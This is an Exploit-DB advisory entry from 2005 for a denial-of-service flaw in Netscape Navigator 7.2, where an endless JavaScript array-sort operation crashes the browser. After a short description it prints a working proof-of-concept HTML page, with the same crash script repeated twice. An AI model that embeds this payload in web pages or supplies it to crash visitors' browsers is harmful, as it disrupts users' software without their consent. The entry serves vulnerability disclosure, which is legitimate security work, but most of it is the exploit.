Netscape Navigator 7.2 Infinite Array Sort Denial of Service Vulnerability

2005-01-21T00:00:00
ID EDB-ID:25056
Type exploitdb
Reporter Berend-Jan Wever
Modified 2005-01-21T00:00:00

Description

Netscape Navigator 7.2 Infinite Array Sort Denial of Service Vulnerability. Dos exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/12331/info

Netscape Navigator is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed. 


<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>